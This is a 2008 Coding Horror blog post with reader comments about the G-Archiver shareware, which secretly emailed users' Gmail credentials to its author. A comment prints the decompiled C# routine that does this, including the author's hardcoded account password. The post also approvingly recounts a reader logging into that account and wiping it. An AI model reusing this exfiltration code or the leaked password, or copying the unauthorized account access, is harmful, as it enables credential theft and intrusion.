programming and human factors
by Jeff Atwood
From the ACM Code of Ethics:
As an ACM member I will
- Contribute to society and human well-being.
- Avoid harm to others.
- Be honest and trustworthy.
- Be fair and take action not to discriminate.
- Honor property rights including copyrights and patent.
- Give proper credit for intellectual property.
- Respect the privacy of others.
- Honor confidentiality.
It's hard to square that with the following hair-raising tale Dustin Brooks sent me via email:
I was looking for a way to back up my gmail account to a local drive. I've accumulated a mass of important information that I would rather not lose. During my search I came across G-Archiver, I figured what the heck I'll give it a try.It didn't really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code. What I came across was quite shocking. John Terry, the apparent creator, hard coded his username and password to his gmail account in source code. All right, not the smartest thing in the world to do, but then I noticed that every time a user adds their account to the program to back up their data, it sends and email with their username and password to his personal email box! Having just entered my own information I became concerned.
I opened up a browser and logged in to gmail using his account information. It still worked.
Upon getting to the inbox I was greeted with 1,777 emails with account information for everyone who had ever used the software and right at the top was mine. I decided to go ahead and blast every email to the deleted folder and then empty it. I may have accidentally changed the password and security question to something I don't remember as well, whoops, my bad. I also contacted google to erase this account as I didn't see a way to delete it myself.
I generally try to give people the benefit of the doubt, but it's difficult to imagine any scenario where this isn't a completely malicious violation of people's trust. This is every user's greatest fear when giving out their login credentials, and to see it realized hurts the trust relationship between users and every other professional programmer working today. I've inadvertently posted my own login information to this very blog before. Fortunately for me, an eagle-eyed reader by the name of Israel Orange didn't abuse that information for his own gain, but instead kindly pointed out my error to me in a private email.
I certainly hope there are more programmers out there like Israel Orange than John Terry. Ethics matter for programmers, too.
I had a guy email me his Credit Report once in Electronic Form. He frantically emailed me and asked me to delete it, which I did. I called him and he was so happy that he sent me an Amazon.com giftcard for $25. I have had people email me their e-tickets for their flights, etc.
Brian W on March 7, 2008 2:40 AMThats really bad, and the problem is that only people like us (who knows what reflector is) realize of that kind of things and very often the law is short to punish this kinds of crimes.
Good Job Jeff! if you stop programming try to be a detective or a tv series writer.
I really enjoy your blog, thanks!
Ral Martnez on March 7, 2008 2:41 AMGoes to show how much you can trust websites which request your email user/pass to import contacts!
Mithun on March 7, 2008 2:43 AMTrust is good, possibility to check is better. If anything, this story is the best warning against closed source software.
BTW, why is this software still linked to?
Nikolai on March 7, 2008 3:08 AMFunny, alot of people seems to be praising Jeff's honesty. Althought I'm sure Jeff is honest, the hero of the story is John Terry, as Jeff himself clearly points out. Not sure where this misunderstanding is coming from
mwalts on March 7, 2008 3:19 AMActually, mwalts, it's Dustin Brooks who is the curious programmer who figured this out. Though I don't know why Jeff doesn't link to the original source.
KyleG on March 7, 2008 3:23 AMActually John Terry is the antagonist in this story and Dustin Brooks, the protagonist, deserves all the praise.
Robert Kozak on March 7, 2008 3:23 AM"Trust but verify."
R. Reagan on March 7, 2008 3:25 AMKyleG, I agree, I love Jeff's blog but sometimes I wish he would link better to the original source. If in this case it was sent to him privately in an email, he should at least point that out.
Robert Kozak on March 7, 2008 3:25 AMSurely the *real* hero is Dustin Brooks? John Terry is the villain of the tale.
Confused on March 7, 2008 3:27 AMGood will, but poor action:
"John Terry" had probably setup an email forwarding to a backup gmail account in case somebody decompile his code.
So he still has all the passwords.
So now, with everything deleted and the account password modified, how are we going to notify all these account that they should change their password ?
Fabien on March 7, 2008 3:30 AMThat's why I don't download programs from those shareware directories.
Check out the site of the g-archiver "author": http://www.matemediainc.com
Looks like a spammy SEO site. Not surprised. There's probably a lot of shareware out there like this, because most of the time the guys pulling scams like this are script kiddies who are trading "recipes" on private forums.
engtech on March 7, 2008 3:30 AMIt's great to see somebody talking about ethics in relation to programming. So often I think it's easy to get caught up in an idea of "I'm just interacting with a machine, and it interacts with other machines, and I'm not responsible for anything...".
It's also unfortunate that there really are people out there who would violate those ethics, but it's good to see that they are real--that's something that does have to be confronted.
I think point 1 in that ACM code is also something to think about. I wonder how many people are working on software that really does not contribute to human well-being, and don't think about it. It's an unfortunate tradition, though--some of the first computers ever were used to aim missiles, and without some twisty logic it's hard to say how that contributes to human well-being more than other things the same programmer could have spent their time doing.
-Max
Max Kanat-Alexander on March 7, 2008 3:31 AM"Actually, mwalts, it's Dustin Brooks who is the curious programmer who figured this out. Though I don't know why Jeff doesn't link to the original source."
I'm pretty sure this IS the original source. There are no other references to Dustin Brooks / John Terry / G-Archiver that I can find on the web.
Jeff's usually really awesome about linking to sources.
engtech on March 7, 2008 3:33 AMYou stopped FAR too short. This should be turned over to authorities. That must be some sort of CRIMINAL offense.
uhura on March 7, 2008 3:34 AMWow. How incredible. I think this is a wake-up call... we shouldn't automatically trust software.
Alan Hogan on March 7, 2008 3:35 AMYou logged into my gmail account? And deleted the fruits of my hard work? Some people have no shame!
(sorry, couldn't resist. -- My name is Thomas, not J Terry)
jterry79 on March 7, 2008 3:41 AMmwalts: Dustin Brooks is the hero, not John Terry. John Terry is the inept coder.
leetdood on March 7, 2008 3:43 AMThis John Terry seems to email pawel lesnikowski and adityasonphavde (aditya rao) I would not trust these people either.
joe on March 7, 2008 3:51 AMThis sort of problem is what OAuth is designed to help solve.
Not only can 3rd party websites not truely be trusted with one's passwords, now that all computers are pretty much online all the time, it's not safe to trust closed source apps, or even open source apps with uninspected code, with one's password.
Mark Atwood on March 7, 2008 3:54 AMFirst of all, Dustin Brooks for president. What a hero.
Next, note that matemedia.com (alleged publisher of this tool) has at least two telephone numbers:
1-877-309-7521
1-877-752-1309
(first via http://www.russmate.com/client_support.php, second via whois)
Dustin Brooks' sense of humor seems to be at least equal to his sense of justice. I want Mr. Brooks to call "John Terry" and explain the situation. In fact, if he recorded the call and placed the MP3 on a lame shareware site I would probably even pay $29.95 to listen.
PWills on March 7, 2008 4:04 AMThat's fishy. Why would jterry need to include his u/p in the program? As a diabolical villain, I don't think he'd make the cut to be on 24. I mean, this isn't like an IRC bot where you have to put the hostname to phone home to into the bot... He could have sent email to his account without exposing the password!
Is he really that dense, or is this some kind of weird hoax?
One thing is true -- if you DL the program and use reflector, you do indeed see the facts as they are described in this post:
public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add("JTerry79@gmail.com");
message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}
Patrick wrote :
That's fishy. Why would jterry need to include his u/p in the program?
Because GMail requires authentication to use their SMTP server.
Why would anyone pay $30 to get a backup copy of their GMail account when Thunderbird is free? Just connect to GMail's IMAP server, set TB to save all downloaded messages, and do a complete sync. Not only would you then have a complete backup, but you would also be able to read and send email from TB while having it synced with GMail.
Just about any other mail client with IMAP support should also work.
Daniel E. Renfer on March 7, 2008 4:15 AMJeff's usually really awesome about linking to sources.
Thank you, I do try very very hard to link all the sources I talk about. The original is from an email; I added some text to the post to clarify this and put Dustin's name in bold.
And yes, Dustin is the hero here, not me. I'm just reporting it.
Jeff Atwood on March 7, 2008 4:16 AMLook everyone, I don't mean to be bursting everyones bubble but I'm not finding this in the source code anywhere. While this is my first time using reflector, I'm not an idiot and I have searched through all the source code Reflector produces and there is no reference to an email address "jterry79@gmail.com"
Now maybe the software has been updated and the malicious code has been removed, or maybe someone is crying wolf. I would love for someone to reference something specific other than "hey look what I found."
Ryan on March 7, 2008 4:16 AMRyan wrote :
I'm not finding this in the source code anywhere
The CheckConnection method is in the SM.dll Mail class. It is not in the EXE.
Patrick copy / pasted the code accurately.
Matt on March 7, 2008 4:19 AMMy apologies everyone. Looks like I am an idiot.
Ryan on March 7, 2008 4:22 AMWhat about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible? That would seem to violate principles 1 and 2. Or, what about working for an online gambling site? I'm just curious as to where you would draw the line.
Travis on March 7, 2008 4:28 AMThis was truly malicious behavior, but (as Jeff has pointed out in previous posts) users do not understand how accessible their identity can be:
I recently recovered a PC from a municipal recycling center. While evaluating its value for parts I discovered it was completely functional. The HDD still had the OS, Outlook, and several years of Turbo Tax on it. Everything was live. I didn't have the nerve to call the guy and tell him how stupid he was, but I was kind enough to bomb the machine to bedrock before reconditioning it. My son now happly surfs PBS on it. Not a bad exchange for a $20 electronics recycling charge and a dead TV.
There are times when I really pity the great unwashed user contingent, and at the same time am grateful that most geeks are non-belligerent.
Rick Cabral on March 7, 2008 4:30 AMJeff,
Great detective work.
I don't know if you've ever covered this, but I would think that just asking a user for username and password and email address on a website would probably net someone a certain percentage of people who would for simplicity sake just use the same username and password everywhere (thereby giving you their username and password to email, or who knows what).
In response to Travis, some engineers reportedly quit the company that makes the space shuttle's robotic arm, because of a proposed takeover by a U.S. arms maker.
Chris L on March 7, 2008 5:21 AMWhat about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible? That would seem to violate principles 1 and 2. Or, what about working for an online gambling site? I'm just curious as to where you would draw the line.
That's always been the big problem. It's not unique to computer science at all. One could say it started with the physicists "knowing sin" but in reality you can trace it back a lot farther.
But in reality the people taking a paycheck always find a way to justify it to themselves. Oh, they're not the ones harming others -- that's what the military does, what politicians do. Oh, they're not the ones not contributing to society -- they just make the tools. Same old story.
Shmork on March 7, 2008 5:43 AMMy oh my, that is horrible! It goes to show how much seemingly legitimate software we install that could be malicious, and how much we trust we place in the authors.
This time round you had the source code, what about apps that we don't?
Ryan Allen on March 7, 2008 6:32 AMYeah, it's bad, but come on, use your common sense - there is no such thing as free software. Someone gets something out of it, it might not be money it might be data. Never use shareware - here is the answer.
PaulZ on March 7, 2008 7:06 AMYou don't have to try to justify it. Like it or not, there is evil in the world and people have a moral obligation to protect themselves and their families.
Some of us take that seriously, while others live behind that protection and point fingers about how bad it is.
Oh, and before I worked for a DoD contractor I worked on medical software that was responsible for helping to bring new lives into this world that might not make it.
With either job, I know I am making a difference in the world and sleeping just fine at night. I doubt if I would feel the same working on a new search engine or game or accounting package.
Didn't Dustin email all the affected users to warn them to change their passwords?
Jeremy on March 7, 2008 7:18 AMI have a problem with 4 in conjunction with 5. Often I find a lot that is unfair in our current copyright law and fairness. (Example: the RIAA has changed its tune and claim it is illegal to rip a CD you purchased for your computer or MP3 player.)
In order to behave in a fair way, I should be allowed to break copyright. But then, I'd be breaking copyright.
gex on March 7, 2008 7:40 AMI'm no fan of professional soccer, but a quick search or two on some of the (non-victim) names from the screenshot appear to be related to it (John Terry of Chelsea, Pawel, and Lesnikowski). Maybe the dickwad responsible for this douchebaggery (thanks Jeff for expanding my vocabulary) is a fan.
Fortunately for me, an eagle-eyed reader by the name of Israel Orange didn't abuse that information for his own gain, but instead kindly pointed out my error to me in a private email.
Is this why you chose the word "orange" for the post security word? Interesting choice. :)
Nice post Jeff.
Patrick on March 7, 2008 8:06 AMRule: wherever you give your passwords you should/must be cautious.
Nikos on March 7, 2008 8:08 AMThe ACM also has a similar document called Software Engineering Code of Ethics and Professional Practice which has more practical and tangible aspirations. These aren't just rules for ACM members, they prescribe a code of conduct for all software engineers.
http://www.acm.org/about/se-code#full
of these, John Terry has violated these:
3.12. Work to develop software and related documents that respect the privacy of those who will be affected by that software.
3.13. Be careful to use only accurate data derived by ethical and lawful means, and use it only in ways properly authorized.
Ken Liu on March 7, 2008 8:32 AMAnd that, my friends, truly is coding horror.
John Walker on March 7, 2008 8:37 AMHi Jeff,
I don't normally post but I thought I should make an exception for this topic.
I completely agree that this is a horrible betrayal of trust. I find this offensive to the honest programmers out there for whom this has negative effects. It's scumbags like this guy that make people question every file, live in fear of scams, and contribute to fear of technology.
I really enjoy your blog, thanks for sharing this.
Kyle on March 7, 2008 8:38 AMTo give John Terry the benefit of the doubt, there is always the possibility that this was some kind of development (debugging) version that had somehow become publicly available.
A. Nony Mouse on March 7, 2008 8:38 AMThese guys are also selling programs for MySpace and YouTube (FriendTools and TubeAdder) that require your login/password.
And here's the kicker: they're both spamming tools.
"Add thousands of new friends to your network quickly. Great tool for those who want to market to myspace users."
"This easy to use software also automates the process of adding comments on YouTube. If you plan on marketing on YouTube, you need this tool."
That russmate.com/matemedia.com site rang a bell - I knew I'd seen it somewhere before. Recently. Amid many LOLs.
And yes indeed - MateMedia turned out to be the company hosting a scammy "Federal suppliers directory" site which gave Alex Papadimoulis of The Daily WTF a chance to run a most excellent story all his own:
http://thedailywtf.com/Articles/So-You-Hacked-Our-Site!.aspx
(Do NOT miss the spectacular flameout by company staff in the comments!)
Man, 2008's really shaping up to be their year, isn't it?
This is really a big threat for opensource or freeware developers. Users wont trust developers anymore whom are working hard to provide something useful.
Sahil Saggar on March 7, 2008 10:22 AMWhy didn't Mr. Brooks just use an old-fashioned Perl script for archiving?
Sharma on March 7, 2008 10:25 AMterrible!
And Ryan the info is still there it is in Mail class in SM.dll file not in main exe.
I don't normally post, but I wanted to comment on those who are saying that programming in some way for the military violates 1 and 2 of the code above. As Oogie Pringle said, there are people in the world who are malicious, and it is important to defend against them.
Maybe this could be seen as an unfortunate prisoner's dilemma, but in no way does it reflect poorly on the ethical or moral sense of the people doing the programming.
DKH on March 7, 2008 10:54 AMPlease elaborate more on reflector please.
Author/website perhaps? Thanks.
Phil
Phil on March 7, 2008 10:58 AM@Phil:
Lutz Roeder's .NET Reflector: http://www.aisto.com/roeder/dotnet/
Excellent tool.
We use Lutz as a verb. "Let's lutz it and find out"
@Domenic - please stop programming, right now.
Ciaran on March 8, 2008 1:09 AMDave asked, "Were his [Dustin Brooks] actions /really/ any more "ethical" than John Terry's?"
To which the answer is a resounding "yes."
Ben Poole on March 8, 2008 1:11 AM@stewie
Go on and live in your little world where everything would be just fine if there were no guns or missiles. I'm sure that before that everyone live in peace and harmony, right? Of course, all you have to do is look at North America BEFORE 1492 and that goes right out the door.
And don't worry. People like me will continue to defend people like you so you can live in your safe little world.
Oogie
Oogie Pringle on March 8, 2008 1:43 AMDomenic,
you would like to use an encrypted appSettings element in your app.config then.
http://msdn2.microsoft.com/en-us/library/ms998280.aspx
Domenic, security by obscurity has never been a solution. You don't embed sensitive credentials in code. Period.
Encrypting the data means you have a key somewhere. Writing your own cryptographic algorithm means it's broken (see Schneier) and anyway, all that's needed to break your clever encrypted-password-in-executable scheme is to set up a software http/https proxy (fiddler, wireshark, etc.) and read the plain text credentials passed by the program.
Never rely on native code obfuscation for security.
Yann Schwartz on March 8, 2008 1:56 AMHAH! I was *not* expecting my name to pop up when I started reading this post :-) BTW, Jeff sent me some awesome Coding Horror stickers for my trouble.
Patrick-I can't take credit for Jeff's choice of CAPTCHA-it was around a long time before I ever spoke to him.
Israel Orange on March 8, 2008 1:57 AMCool ... it's OK to *steal* a log-in and password from source code, illegally log in to the email account and destroy all the messages [and the account had the perp figured out how] -because- you guys didn't like what the vendor was doing.
You haven't the foggiest fricking idea what he was /actually/ doing with any of that information - but your assumption that he was up to no good gives you the warm and fuzzy you need do what ever the hell you want. Bah ... I call BS!
Please don't confuse /any/ of this with any misguided perception that I condone what was originally happened - I'm appalled -but- that doesn't give you the right ...
the doctrine of double-effect
Horse hockey!
Both events [provided the first one is /actually/ illegal] should be punishable by law.
Have a pleasant day,
That's why i don't trust shareware. They can leave you with a bunch of spyware and steel your personal information. The only software that I can trust is free (as in freedom) software.
Keitare on March 8, 2008 2:51 AMCurious thought. The email address may have been embedded in the code and done what you say, but the snapshot of the inbox shows that ALL of those passwords and email addresses were NEW and UNREAD.
Although it was a completely dumbass way of going about things, i would probably deduce that the email account was set up to capture those for the lost passwords and account names for those who use the program or something equally idiotic. In no way am i saying this is the right thing to do, but the programmer was more than likely extremely foolish, but mostly oblivious to the trust he was violating.
On the other hand, the gentleman you say had alerted google of this, violates someone else's inbox, using someone else's information that required a bit of digging to get, trashes this other party's email account, and sends a note marking it for deletion.
This is ALSO a vast breech of proper ethics.
the first thing to dowould be alert the programmer of this error, and request that it isdealt with in an ethical manner that alerts his users of this "programming error" and then re-releases with a better password storage option, if any at all.
If this fails to geyt any attention, then report it to the proper authorities or agency for dealing with this issue, as well as google.
Your friend may be in some hot water for his actions as well.
The Postindustrialist on March 8, 2008 3:09 AMAnother reason to NO revelate your password in software
nymphetamine on March 8, 2008 3:33 AMGood thing you changed the password to the account.So is John Terry walking scott-free ? I believe he has some explaining to do .
gogole on March 8, 2008 4:22 AMHoly Living Funk! What a huge scam, I'm going to every shareware download site that will let me post a review of this and link to this article, great job! Really love your blog, everyday reader for a few months now.
jeremy on March 8, 2008 4:50 AMOrange? I'm typing in orange, and you wrote about John Orange. Heh.
EVERYONE SHOULD USE OPENID TO AVOID THIS CRAP :)
Greg Magarshak on March 8, 2008 4:55 AMEven after all this, John Terry still has less information about his victims than your average Google employee.
Geri on March 8, 2008 4:59 AMIN GENERAL
if A does something illegal
and person B does something illegal to uncover it
B's evidence should be admissible in court
and both A and B should be tried for the crimes they committed.
In our current society, though, police may uncover crucial evidence without a warrant but it will be inadmissible in court. I think it is much more fair for the evidence to still be admissible in court AND for the officer to be tried for the crime of breaking and entering. If they want to risk a few years in jail to put a violent criminal behind bars, they should have the ability to do so.
Greg
Greg Magarshak on March 8, 2008 4:59 AM[quote=dave]This is appalling. I'm really glad you wrote the article.
Given that, there's not a word here about the ethics of Dustin Brooks having;
1) using Reflector to take a peek at the source code that wasn't his,
2) opening up a browser and logging in to gmail that wasn't his using the found account information,
3) deciding to go ahead and blast every email to the deleted folder and then empty it on an account that wasn't his,
4) changing the password and security question on an account that wasn't his, and
5) contacting google to erase this account only after he didn't see a way to delete it himself.
I thought the topic here was Ethics [albeit Programming Ethics]?
To my way of thinking all he had the right to do was contact google and report the incident.
Were his actions /really/ any more "ethical" than John Terry's?
[/quote]
There is certainly an opportunity for academic debate on the ethics exhibited by Misters Brooks and Terry, but I know where I stand within that debate. Your view struck me right away, upon reading this article, but truthfully (non-violent) vigilante justice is consistent with my personal ethics, so I don't see a conflict here. Especially when it comes down to this kind of rarely prosecuted, yet extremely harmful crime. Mr. Brooks, we are to presume, would never log into someone's account maliciously. He was simply protecting himself, and others. Mr. Terry had no right to that information to begin with, I see no foul play in preventing him from accessing it, and forcing him to contact google... or sign up for another account, of course. I believe Mr. Brooks to be a hero without doubt.
jeremy on March 8, 2008 5:01 AMWhy do people act so shocked? If you download any app or go to any website which asks for you credentials to do *anything* you should be extremely cautious and only trust once you've verified that it is legit. You might argue that there was no way to verify it in this case without reflecting it and looking at what it was doing, but your credentials are basically your children when you're roaming the 'net - so if you can't verify it, DON'T USE IT. It's pretty simple. And for the person who said this guy was probably smart enough to create a back-up account "in case someone reflected his code"... no, he would have obfuscated the code if he was being cautious. He f'ed up.
I assume most of you would trust, say, Facebook to keep its word and *not* store your credentials when you allow it to use its "Friend Finder"? Why?
And it's frankly a waste of time to say this is a matter of ethics and we all need to be held to a higher standard and "if only he adhered to the code" etc. Sorry, the 'net is the real world, it's not contained within our individual computers. People are out to scam, and you need to go out there believing it. As honest programmers we need to stick together, and the scammers will make themselves known. That's the real value of Jeff's post.
SpongeJim on March 8, 2008 5:20 AMThank you Dustin Brooks for erasing the credentials. I was not on the list but you definitely made the world a better place. Also thanks for exposing the phisher and trojan malware author.
To those that he did not do the right thing: There is NO excuse harvesting passwords. Even if "John Terry" is merely a total moron it's inexcusable, and I'm not buying it, stealing users passwords is done for ill gain.
I'd probably wouldn't do exactly as Brooks, such as I'd log in through Tor, get shocked like him, changed the password, made sure there was no forwarding, notified all users by sending them a warning together with their respective account passwords to make sure they understand it's real, then not delete anything but get the attention of the police. But I'm in no place to complain as I wouldn't have refractored it in the first place. Again, he certainly did the best he could think of, it seems he probably did neuter it, and he made the details about the trojan public. Very good job.
"If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did."
actually, dustin did miss one step. Mass emailing everyone involved to let them know what happened.
It's trivial for someone with your gmail user/password to set up a backdoor using email forwarding so that they'll get copies of any email with "password" in it or billing information.
Hell, all they have to do is change your "secondary password recovery email address" as well and they'll be able to hijack your account whenever they want to. I had this happen to me when the domain name for my password recovery email address got sold: http://internetducttape.com/2007/10/31/password-recovery-online-security/
engtech on March 8, 2008 5:33 AMWhat if this article had been about Brooks getting caught in the email account where all he found was personal mail? There's little if anything to indicate that it was any more than a crap shoot (with pretty big odds in his favor admittedly) that he would.
Although he did state: 'I noticed that every time a user adds their account to the program to back up their data, it sends and email with their username and password to his personal email box.'
Wonder how he noticed that about 'other' users.
In addition the comment: 'It didn't really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code.' - doesn't cause any alarms here, amazing. How would having a peek improve the functionality of the program?
Have your big hug-fest because a data farmer was snagged. What he did to get there, IMHO, was wrong. I won't bother arguing the issue any further, we seem to differ on opinion in this regard ... which is ok by me. It's all just the perspective I saw/read it from at any rate.
Dave on March 8, 2008 5:44 AM What if this article had been about Brooks getting caught
in the email account where all he found was personal mail?"
In this case perhaps he'd send the account an email suggesting "Terry" should change is password. And again, he would have helped someone.
In addition the comment: 'It didn't really have the functionality
I was looking for, but being a programmer myself I used Reflector
to take a peek at the source code.' - doesn't cause any alarms
here, amazing. How would having a peek improve the functionality
of the program?
That's one of the ways malware is identified. It's really hard to turn it around against him, especially when we know what he did.
Anonymous on March 8, 2008 5:54 AM*uses my handy-dandy CSI black-stripe decryptor to get the passwords from your image*
Shouldn't you be putting a "nofollow" on the G-Archiver link?
Pdraig Brady on March 8, 2008 7:12 AMActually, Ral, U.S. law is very specific as to this particular issue. Have a look at the Federal Wiretap Act, 18 U.S.C. 2510 (http://www.cybercrime.gov/wiretap2510_2522.htm)
Joshua Auriemma on March 8, 2008 7:21 AMSo, just to be a little contrarian can anyone point out in the code of ethics where it says that programmers should become vigillantes? It would seem to me that Dustin Brooks falls short of living up to the ideal of honoring property rights. By deleting the GMail account and the emails there-in Dustin has potentially opened himself up to potential prosecution under laws designed to be used against hackers. In addition he has potentially destroyed evidence that might be used to prosecute John Terry.
If he really wanted to be a good guy he could have just reported the individual to Google's security hotline along with the appropriate documentation, as well as reporting to the shareware site where the application was hosted.
Joe Brinkman on March 8, 2008 7:28 AMTravis,
What if you like killing people? You're choices are limited in that case: join the military (if you can) and get paid to do what you enjoy, work for a weapons development company and get paid more, or commit a "crime". It's all about perspective and if you're working freelance or as an employee :).
You did download it directly from the developer's site? Or purchase it?
There is the possibility that you downloaded a hacked version. Although it seems unlikely the gmail account would be similar to the developer's name... a less lame scammer would send to a mail server that wouldn't provide access using same password or be traceable back to him.
If you purchased it and/or didn't accept a use at your own risk license it's hard to imagine a crime or civil liability doesn't exist.
curmudgeonly troll on March 8, 2008 7:39 AM@Joe:
If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did. Stopping the leak should be first priority, then catching the guy. The chances of the latter, and successfully prosecuting him/her, are unfortunately slim anyway.
A. L. Flanagan on March 8, 2008 7:46 AMOne point about trusting "free" software: there's a big difference between this sort of program and open source projects, where you (and everyone) can see the actual source code. This couldn't have happened if someone knowledgeable had been able to even glance at the source.
A. L. Flanagan on March 8, 2008 7:48 AMDave wrote "You haven't the foggiest fricking idea what he was /actually/ doing with any of that information"
It doesn't matter what he was doing with it. Just collecting it without informing users that he was collecting it is either a breach of privacy laws and/or fraud.
Of course, if you don't think so, I have this new remote login application I'd like you to try. It doesn't email the IP, username, and password/SSH certificate used to me or anything!
Powerlord on March 8, 2008 7:48 AMI was going to respond telling John Terry how he could have avoided this situation, but I decided to apply the Code of Ethics and not do so. Hopefully I made the world a better place today.
modern women suck on March 8, 2008 8:05 AMShameless proselytising...
This is one reason that users should be entitled to examine the source code, or otherwise reverse engineer/analyse the workings of a piece of software, without fear of legal backlash.
There is an ethical imperative here that overrides any economic rebuttal.
Justin Megawarne on March 8, 2008 8:12 AM@Oogie Pringle
That’s the problem with this world, people like you. You are all about self preservation and the preservation of those close to you. The fact is that if we considered those around us who we don't know as equal in worth to ourselves we would think twice be-fore working on weapons and devices that we know will kill others. Just because you justify it by saying that there are evil people in the world, does not absolve you from fact that you are a contributing factor to that persons death. More innocent people die today as a result of the direct work that we do. This is no longer the days of open war when enemies met in a field and attacked each other and you knew that pretty much anybody who was there had decided to give their life for that cause. Now we have more innocent people dying than combatants. So you have to ask yourself when you write that code for the guidance chip that goes in the missile, but for the fact that I and my colleagues chose to write this code would xxxxx be dead? I know you sleep well at night because you think you are protecting your family and that is the truly tragic part about this. I know some will make the argument that anything can be a weapon, you don't know how it is going to be used, well can you honestly say that?
@Aaron - I would think linking to the original application i exactly the right thing to do, as CH is likely to show up as the first hit in Google for the software (as of right now it's number 4.)
@Joshua others, the screenshot only shows that the most recent 1777 emails were unread - who knows how many thousands of people have tried the software. Plus, if they are being automatically forwarded they won't show up as read. I'm not sure that what Dustin did was right, but if he had to do it, he could have at least checked out the filters and saved the contact list first.
Interestingly the download and buy links on his site seem to be inactive. Also, I hope this doesn't hurt the reputation of a href="http://garchiver.sourceforge.net/garchiver/a, the GNOME archiving utility with the almost identical name.
Alex on March 8, 2008 8:13 AMI wouldn't worry too much about notifying the people about their username/password compromise. As you can clearly see, the emails have never been read. Only Google could read them without marking them as read, and that's kind of irrelevant, now isn't it?
Joshua on March 8, 2008 8:14 AMA.L. Flanagan wrote:
"If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did. Stopping the leak should be first priority, then catching the guy. The chances of the latter, and successfully prosecuting him/her, are unfortunately slim anyway."
Yes, but did Dustin do what's in *Dustin's* best interests? People have been prosecuted for simply reporting security issues in corporate websites, where the intent was benign, not malicious. It's gotten to the point that the best policy is to keep your mouth shut.
As Joe pointed out, Dustin has committed the following potential crimes (I am not a lawyer or police officer):
1) Accessing someone else's mail account, without permission
2) Deleting someone else's data, without permission
3) Destroying evidence
Of course, most will not argue Dustin did the wrong thing *morally*. But who knows, a judge might see it differently.
Here's a story where a university student could've been expelled for accessing unsecured data on a campus network:
http://chronicle.com/news/article/3146/university-allows-student-journalist-who-discovered-data-security-flaw-to-remain
It's gotten to the point that I am hesitate to run anything I dont write myself or download from a trusted source such as Microsoft or other major vendor.
The days of using stuff from TuCows are CNet have been over for quite sometime for me - and then I read something like this and it confirms what were my worst fears.
Mr_Simple on March 8, 2008 8:43 AMStewie and the rest of you anti-defense morons need to take your liberal, kumbaya attitudes and shove them up your a$$e$. In a perfect world we could all rest easy knowing that no one would ever create weapons because they would all abide by some unwritten code of ethics. But the world is not perfect and someone somewhere is going to do the coding. And because of that, we need someone to do the coding on defense systems as well. That's why it's called "defense" and not "offense".
War sucks. And yes, innocent people get hurt. But innocent people get hurt by more than just war. If you stopped programming on everything that could possibly hurt an innocent person then you wouldn't be programming at all.
Matt on March 8, 2008 8:45 AM"If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did."
Thereby destroying the evidence, and stopping any chance you had of successfully...
a) suing for damages, or
b) proving that the criminal acts done in your name with your gmail account weren't actually perpetrated by you.
Much better would have been to change the password on the account (locking the real John Terry out), then report it to Google.
But hindsight is always 20-20, especially when you can be a vigilante hero.
Geri on March 8, 2008 8:45 AM@Joshua
There is a "mark as unread" button in GMail.
Isn't it really about ethics, period, and not just "programming ethics"?
However, it seems a little silly to focus on this incident -- every time we post, the internet remembers; every time we log on, we allow (without the legal action others have mentioned) large corporations to write information to our hard drives without permission, and to "phone home", without our permission.
Damn.
Aalaap Ghag on March 8, 2008 8:54 AMThe "intellectual 'property'" clauses 5 and 6 are why I flatly refuse to join the ACM. I have no difficulty giving credit for authorship - that is to say, I agree with attribution rights and think plagiarism is fraud.
However, as a computer scientist, I stand firmly opposed to copyright and patent monopolies.
5 and 6 are irreconcilable with the others.
1. copyrights and patents actively destroy human well-being.
2. Enforcement of copyrights and patents harm others.
3. Those who enforce copyrights and patents rather than waiving them
are untrustworthy.
4. copyrights and patents discriminate against those who believe in free markets.
5. copyrights and patents are not proper property rights. In fact, they destroy physical property rights (even though you own something, you are not permitted to shape its physical form to convey certain information).
6. I have no difficulty giving credit to authors for authorship. The "proper credit" for "intellectual 'property'" is a massive "SCREW YOU" to whoever came up with the term.
7. Enforcement of patent and copyright in the technological limit (which the relevant infonazis are pursuing with digital restrictions management) requires gross violation of everyone' privacy to make sure people aren't (gasp) copying or using bits of information.
8. It's impossible to truly honour confidentiality while "respecting" copyrights and patents.
A. Programmer on March 8, 2008 8:58 AM@paulz:
"""
Yeah, it's bad, but come on, use your common sense - there is no such thing as free software. Someone gets something out of it, it might not be money it might be data. Never use shareware - here is the answer.
"""
Yes, there is such a thing as free software - free (as in free speech) open source software. The problem is not free (as in free beer) vs commercial, but closed source vs open source. And yes, there are actually programmers that give their work away without trying to steal anything from you.
Bruno on March 8, 2008 8:59 AMCan we now even trust the browsers?
Samrat Patil on March 8, 2008 9:06 AMThe comments to this entry are closed.
Subscribe in a reader
Subscribe via email
|
|
Traffic Stats |